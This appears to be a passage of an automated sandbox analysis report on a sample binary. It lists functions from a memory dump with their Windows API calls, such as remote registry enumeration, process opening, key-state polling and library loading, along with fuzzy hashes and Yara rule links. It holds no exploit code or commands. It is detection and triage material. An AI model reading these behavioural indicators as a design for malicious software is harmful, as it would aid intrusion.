APPEND, xrefs: 00B81B52
REMOVE, xrefs: 00B81B1F
EXISTS, xrefs: 00B81B41

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 2aa523b47d2c2d1b3faa5c545fd23b6617cd3804b632d2ef8d15e54a8e293a11
Instruction ID: 863b09111889201d6f3a9d85f2ccfbddf53e6557bba3de687574ac59b513ccbc
Opcode Fuzzy Hash: 2aa523b47d2c2d1b3faa5c545fd23b6617cd3804b632d2ef8d15e54a8e293a11
Instruction Fuzzy Hash: 07113C719501199BCF00EF98E8528EEB7F8FF26308F1048E5D818A72A1EB325906DB50

Function 00B9EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B9EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B9EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B9ED6A
CloseHandle.KERNEL32(?), ref: 00B9EDEB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 54ec1fd67b9230789466b1788d6f15a7b550441d3add467b2a6fc9db34a23230
Instruction ID: f67d084558b0b460a4a51e2b359e590dfecba8ac9e514acb80ca0879c2076e11
Opcode Fuzzy Hash: 54ec1fd67b9230789466b1788d6f15a7b550441d3add467b2a6fc9db34a23230
Instruction Fuzzy Hash: BE815F716007109FDB20EF28D886F2AB7E5AF48750F14896DF9AD9B2D2DA70EC40CB51

Function 00B4541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B4547B
_memcpy_s.LIBCMT ref: 00B454ED
__read_nolock.LIBCMT ref: 00B4554B
__filbuf.LIBCMT ref: 00B4556E
_memset.LIBCMT ref: 00B455B2

Part of subcall function 00B48B28: __getptd_noexit.LIBCMT ref: 00B48B28

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 93c1ca8df4896a7d1ec491d46747e87744a80b80ea6da25187bba3dd7a525f0e
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 4F51B470A00F059BCB349FA9D88067E77F2EF51321F2487A9F8259A2D6D7709F50AB41

Function 00BA0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00BA0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B9FDAD,?,?), ref: 00BA0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BA00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BA013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BA0183
RegCloseKey.ADVAPI32(?,?), ref: 00BA01AF
RegCloseKey.ADVAPI32(00000000), ref: 00BA01BC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 68ff6eb75b82d4e4c348c25e61ca1b3a1d44ec453fd2a14462af6e897d5c647b
Instruction ID: 18ee281f983bb32fa34a02275d12db81faf424481a78c88ac1ddadcd70a2e672
Opcode Fuzzy Hash: 68ff6eb75b82d4e4c348c25e61ca1b3a1d44ec453fd2a14462af6e897d5c647b
Instruction Fuzzy Hash: DA519E71218205AFC714EF58DC81FAAB7E8FF85304F40886DF599972A2DB31E904CB52

Function 00B9D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B9D927
GetProcAddress.KERNEL32(00000000,?), ref: 00B9D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B9D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00B9DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B9DA21

Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B87896,?,?,00000000), ref: 00B25A2C
Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B87896,?,?,00000000,?,?), ref: 00B25A50

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: fd26413919540d36791e67cb502d32108c93063ffca5518a8aabd72aae2d58bb
Instruction ID: 9d59e2c83ff2615657ff360144f7a84b7c73276c0db7b0c6080bbcf6c3572983
Opcode Fuzzy Hash: fd26413919540d36791e67cb502d32108c93063ffca5518a8aabd72aae2d58bb
Instruction Fuzzy Hash: F3512735A00219DFCB00EFA9D4859ADB7F4FF19320B0480A5E959AB312DB30ED45CF91

Function 00B8E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B8E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B8E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B8E687

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B8E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B8E6B4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 0b574ff240cde5a6845be51263ec0e380414702ff75c140dffb72d1469e43e70
Instruction ID: 2f5576d85fc6fb1279c736502b5d094cbc32a3fc0b16fe35144571fa3ef4deaa
Opcode Fuzzy Hash: 0b574ff240cde5a6845be51263ec0e380414702ff75c140dffb72d1469e43e70
Instruction Fuzzy Hash: BB512B35A00219DFCB01EF64D981AAEBBF5EF09354F1480A9E819AB362DB31ED11DF51

Function 00BAA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddcb69eda83ef48f703f52c15a9b64f2f73f791f23382fdce56aee4ae827643d
Instruction ID: a50de33a415f144507cddbbf3f8f9039db5c2e5c32589a61eabc0c882f28f98a
Opcode Fuzzy Hash: ddcb69eda83ef48f703f52c15a9b64f2f73f791f23382fdce56aee4ae827643d
Instruction Fuzzy Hash: 1A419E35908104BFD724DF68CC89FB9BBE8EB0B310F1401A5E916B72E1CB30AD41DA61

Function 00B22344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B22357
ScreenToClient.USER32(00BE57B0,?), ref: 00B22374
GetAsyncKeyState.USER32(00000001), ref: 00B22399
GetAsyncKeyState.USER32(00000002), ref: 00B223A7

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 59fbdf4403c5b2418801f36af60018963467629651063057137d0aed0155dfce
Instruction ID: 4fc3ee9aed03aba344437d40b7290921bae1c1c53db9476900682f5b921764f8
Opcode Fuzzy Hash: 59fbdf4403c5b2418801f36af60018963467629651063057137d0aed0155dfce
Instruction Fuzzy Hash: B2418E75608215FFCF15DF68C884AE9BBF5FB05361F24439AF828A22A0CB349954DB90

Function 00B763AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B763E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00B76433
TranslateMessage.USER32(?), ref: 00B7645C
DispatchMessageW.USER32(?), ref: 00B76466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B76475

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: cf796abef871b2f36b8c138b66318a973e3a3e8de0c081f77949ac73180fcddf
Instruction ID: 8202374802468951cdb63909db7225b83ec8bd5e4f080215c4db7f1fc2354572
Opcode Fuzzy Hash: cf796abef871b2f36b8c138b66318a973e3a3e8de0c081f77949ac73180fcddf
Instruction Fuzzy Hash: D631C671900A46AFDB348FB4DC85BF67BE8EB01304F1481A5E539D72A0EB359845DB50

Function 00B78A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B78A30
PostMessageW.USER32(?,00000201,00000001), ref: 00B78ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B78AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00B78AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B78AF8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 99d6fdef252d5ed5439081cc54b035e5d8802c757c72b7cffffe6bbb2b1fd604
Instruction ID: b8f8bec0487e6b963a0a0219422de06346542125363efd78e668b8f24a65da15
Opcode Fuzzy Hash: 99d6fdef252d5ed5439081cc54b035e5d8802c757c72b7cffffe6bbb2b1fd604
Instruction Fuzzy Hash: 5D31C271500219EBDF14CFA8D98DAEE3BB5EB05315F10826AF929E71D0CBB09914DB90

Function 00B7B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B7B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B7B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B7B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B7B27F
_wcsstr.LIBCMT ref: 00B7B289

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: d2c7e98d9f398bf1d3c8c23cf6bc6a60160505b7505d160d5025205abe191f36
Instruction ID: c91e1267c0f470f8fdc966f52f57497c3d9051c7db7661c9370a11c2474e5c43
Opcode Fuzzy Hash: d2c7e98d9f398bf1d3c8c23cf6bc6a60160505b7505d160d5025205abe191f36
Instruction Fuzzy Hash: 2B21F5326052057AEB155B799C49F7F7FE8DF49710F0081B9F809DA162EF61DD40AAA0

Function 00BAB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

GetWindowLongW.USER32(?,000000F0), ref: 00BAB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BAB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BAB1CF
GetSystemMetrics.USER32(00000004), ref: 00BAB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B90E90,00000000), ref: 00BAB216

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 66cdb2f1a46a868c5ed2529b28d8200d026ea37990122139172b307c32a11b7b
Instruction ID: 2dcc2435e658f37e7ddbc77174ad58007d3756f452fb84b554fdbed1cb24a0ee
Opcode Fuzzy Hash: 66cdb2f1a46a868c5ed2529b28d8200d026ea37990122139172b307c32a11b7b
Instruction Fuzzy Hash: 68218271924251AFCB209F789C54F6A3BE4EB06321F104769B932D71E1EB3098609B90

Function 00B79307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B79320

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B79352
__itow.LIBCMT ref: 00B7936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B79392
__itow.LIBCMT ref: 00B793A3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 6de5e77a4653a5fbc4df57b97748bc750a29f80bc39a542fb85f17bc44596e62
Instruction ID: 30d0e573b332d2e5eadab9e79f62fc43081ffa1b4c173136c50d9e6875274076
Opcode Fuzzy Hash: 6de5e77a4653a5fbc4df57b97748bc750a29f80bc39a542fb85f17bc44596e62
Instruction Fuzzy Hash: 60210731700208BBDB109EA49C8AEEE7BE8EF49B10F0980A5FD19D72D0DAB0CD419795

Function 00B95A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B95A6E
GetForegroundWindow.USER32 ref: 00B95A85
GetDC.USER32(00000000), ref: 00B95AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00B95ACD
ReleaseDC.USER32(00000000,00000003), ref: 00B95B08

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 83e5005d602934ae656f86f05b335ee8620f8522c929a1e67989f60e8e8f55c8
Instruction ID: b0ef7e3f6541fe118d957df87749bcdacd37cd510472d240074c53aaf02a8fab
Opcode Fuzzy Hash: 83e5005d602934ae656f86f05b335ee8620f8522c929a1e67989f60e8e8f55c8
Instruction Fuzzy Hash: 2121C635A00104AFDB14EFA8DC89AAAB7F5EF49310F1480B9F809D7361CE30AC00CB50

Function 00B212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B2134D
SelectObject.GDI32(?,00000000), ref: 00B2135C
BeginPath.GDI32(?), ref: 00B21373
SelectObject.GDI32(?,00000000), ref: 00B2139C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: fe4e9ba6c74e1b7b4375020c2aa97c3d12e3502afe84e888efdefbd1ce30af9a
Instruction ID: 53e874c99daa2a643a5d890721843a18cb129b344651221c7c71f75c15c0fac5
Opcode Fuzzy Hash: fe4e9ba6c74e1b7b4375020c2aa97c3d12e3502afe84e888efdefbd1ce30af9a
Instruction Fuzzy Hash: 1021A130800658EFDB20CF69EC857A97BE9FB10325F144766F8149B1B0DBB09891CF94

Function 00B7BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00B7BCB3
_memcmp.LIBCMT ref: 00B7BCD1
_memcmp.LIBCMT ref: 00B7BCE4
_memcmp.LIBCMT ref: 00B7BCFC
_memcmp.LIBCMT ref: 00B7BD14

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 18d946bef7ca3b21578f83f86919cc00fef7e070479295f2d488ee69549dc1b4
Instruction ID: 436be3fa46870512f37aef872ee6c7c1526da52c7a30ebebeb9989aa47a9d4be
Opcode Fuzzy Hash: 18d946bef7ca3b21578f83f86919cc00fef7e070479295f2d488ee69549dc1b4
Instruction Fuzzy Hash: E201B5726001097BD6156B259D82FFBB7DCDE10398B04C4A1FD1996383EB50DF509AA0

Function 00B84A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B84ABA
__beginthreadex.LIBCMT ref: 00B84AD8
MessageBoxW.USER32(?,?,?,?), ref: 00B84AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B84B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B84B0A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 0bb2a5df9ecc8b4ed09fd41c5d6c2f579f4a2b7f71ef5f78d8d19b9755d344b5
Instruction ID: 6447748d47a6bb215ee883712a75ca221b14408eb15c0012af1eb316efe579cc
Opcode Fuzzy Hash: 0bb2a5df9ecc8b4ed09fd41c5d6c2f579f4a2b7f71ef5f78d8d19b9755d344b5
Instruction Fuzzy Hash: 02110876905656BBCB109FE89C45BEB7FECEB46324F1442A9F914D7260DB71C900C7A0

Function 00B78202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B7821E
